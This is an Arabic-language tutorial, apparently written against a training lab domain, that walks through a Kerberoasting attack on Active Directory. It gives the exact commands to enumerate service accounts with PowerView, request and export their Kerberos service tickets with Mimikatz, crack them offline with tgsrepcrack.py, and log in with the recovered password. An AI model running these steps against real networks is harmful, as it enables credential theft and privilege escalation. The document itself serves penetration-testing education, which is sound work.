Domain Privilege Escalation - Kerberoasting Attack

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

في هذي المقالة راح نشرح التكينك الثالث لي الـDomain Privilege وهو الـKerberoasting

قبل نبدا شرح التكنيك خلونا نعرف ايش هو تكنيك Kerberoasting؟

الفكرة من هذا التكنيك انه نبحث عن مستخدمين لديهم صلاحية لتنفيذ خدمة معينه في جهاز معين ف انا راح استغل الخدمة هذي عشان احصل على الـTGS الخاصة في المستخدم ونسوي لها Crack عن طريق اداة tgscrack بعد كذا ندخل للجهاز

 

الشرح:
 

راح نسوي Load في الميموري لـ اداة PowerView عن طريق هذا الامر:

Import-Module .\PowerView_dev.ps1

الان راح نبحث عن مستخدمين لديهم صلاحية لتنفيذ خدمة معينه في جهاز معين عن طريق هذا الامر:

Get-NetUser -SPN

نلاحظ انه المستخدم svcadmin لديه صلاحية على خدمة MSSQLsvc في جهاز dcrop-mgmt.dollarcorp.moneycorp.local

الان راح نسوي طلب لي الـTGS الخاصه في هذا المستخدم عن طريق هذي الامرين
 

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

الان راح نسوي Export لي الـTGS الخاص بـMSSQLSvc عن طريق اداة Mimikatz


الامر:

kerberos::list /export

الان راح نكرك الـTGS عن طريق اداة tgscrack عن طريق هذا الامر:
 

python .\tgsrepcrack.py .\10k-worst-pass.txt .\tgs.kirbi

الان راح نفتح جلسة Powershell جديدة بالمستخدم svcadmin والباسورد الخاص فيه اللي هو *ThisisBlasphemyThisisMadness!!

 الان راح اجرب ادخل لجهاز dcrop-mgmt ونشوف هل يدخلنا او لا

 

قدرنا ندخل لجهاز dcrop-mgmt عن طريق المستخدم svcadmin لانه يمكنه تنفيذ خدمة MSSQLSvc في جهاز dcrop-mgmt


وصلنا الى نهاية المقالة

شاكر لكم.